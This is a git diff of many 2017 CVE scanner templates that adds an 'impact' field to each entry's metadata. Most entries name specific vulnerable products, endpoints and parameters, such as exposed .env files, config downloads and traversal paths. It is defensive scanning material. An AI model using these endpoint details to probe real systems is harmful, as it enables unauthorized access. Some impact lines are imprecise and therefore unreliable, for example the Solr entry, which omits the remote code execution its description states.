a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 84e7654a49..fec01e0de5 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server. remediation: | Apply the latest security patches provided by Oracle to fix this vulnerability. Additionally, restrict network access to the WebLogic server and implement strong authentication mechanisms. reference: diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index ae7fc212db..c7db92c16e 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080. + impact: | + The vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of Yaws or apply the necessary security patches. reference: diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index efe49f232d..2dc7da491f 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive data, potentially compromising the confidentiality of the system. remediation: | Apply the latest firmware update provided by the vendor to mitigate the information disclosure vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 8dd23f10e7..68d9f39bc4 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: "Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array." + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Upgrade Subrion CMS to version 4.1.5.10 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 25bbeab7c3..b77be7675f 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. reference: diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index be88124dd2..eecc4aedfa 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 12f7e1eced..7f33905f06 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -5,6 +5,8 @@ info: author: notnotnotveg severity: high description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or disable the XML-RPC server if not required. reference: diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 8cb7b988bd..dd868626fe 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index c7d018d096..f7b0f52e06 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 74cefe700e..9823a75bd1 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -5,6 +5,8 @@ info: author: fopina,s0obi severity: critical description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected server. remediation: | Apply the latest security patches and updates provided by Jboss to fix this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index bbfbfc573c..e2624af724 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index d56380cb90..72058b633c 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -5,6 +5,8 @@ info: author: divya_mudgal severity: medium description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software. reference: diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index b8f4e8a471..808461ef44 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index cc48a8b7fb..f465636628 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks. + impact: | + Remote code execution remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 2a60275827..d9b0ac58e4 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat. reference: diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 39dfd84822..46f4ad1ad5 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -6,6 +6,8 @@ info: severity: high description: | When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. remediation: | Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index ed3861af9b..6cdc71ef77 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr. + impact: | + Successful exploitation of this vulnerability could lead to information disclosure, denial of service. remediation: | Upgrade to a patched version of Apache Solr (7.2 or higher) or apply the recommended security patches. reference: diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 01abe6a5ba..9d6bbaa1c7 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + impact: | + Remote attackers can exploit this vulnerability to escalate privileges. remediation: | Upgrade Apache CouchDB to version 2.1.1 or later. reference: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 34fec57bb8..8cb7c91893 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -5,6 +5,8 @@ info: author: apt-mirror severity: high description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise. remediation: | Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5. reference: diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 7e516b6081..f249cd367e 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project. reference: diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index f3fcb3fe1c..7af3c3bf9e 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: critical description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or upgrade to a patched version of OpenDreambox. reference: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 1260cbe409..6ffe76e57b 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement. remediation: | Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index c9e3fe61d8..0ae3ae256d 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 16a0c99bb3..6e9dc60afe 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 71a5818719..926f5239c4 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server. remediation: | Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 5df9103dca..9a32849e9b 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 45ebd5741d..59d9f20f2b 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -5,6 +5,8 @@ info: author: mass0ma severity: medium description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 1d1f18c262..b252f9e924 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -5,6 +5,8 @@ info: author: Random_Robbie severity: high description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 8a2b4e34ac..ec08870f2d 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks. reference: diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 654d4a1ba0..2257795949 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter. + impact: | + The vulnerability allows an attacker to include local files, potentially leading to unauthorized access or code execution. remediation: | Update to the latest version of Restler and TYPO3 to fix the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 6bc0c78bdc..9d6cedc3c9 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest firmware update provided by FiberHome to fix the LFI vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 7506ebf435..e91577b69f 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in , which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. + impact: | + An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access. remediation: | Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches. reference: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 582d380067..92bc06911b 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -5,6 +5,8 @@ info: author: emadshanab,milo2012 severity: critical description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by Palo Alto Networks. reference: diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 55d7eb2883..873ec3e31f 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs. + impact: | + An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server. remediation: | Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 3271ccd802..2e9f00ad30 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Upgrade Nextjs to version 2.4.1 or above to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index dc76963dd1..bf68dd2302 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the application. remediation: | Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 7083be0b7e..d8da9b6747 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + impact: | + Successful exploitation of this vulnerability could lead to the theft of sensitive information, session hijacking, or the execution of arbitrary code in the context of the affected user. remediation: | Update to the latest version of the WordPress Emag Marketplace Connector plugin (1.1) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index a8919bc489..a1b4c061ac 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser. remediation: | Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 7752e2f05d..8a7d5f9571 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 0f15b649b6..c26c8850c3 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -6,6 +6,8 @@ info: severity: high description: | description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. remediation: | Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index d44999c3d3..4e90a1c740 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 1df0e340a4..819e347bb7 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard. + impact: | + An attacker can gain administrative privileges on the Kentico CMS system. remediation: | Upgrade to the latest version of Kentico CMS to fix the privilege escalation vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 4d9c0bea4e..cbd21bb55b 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml 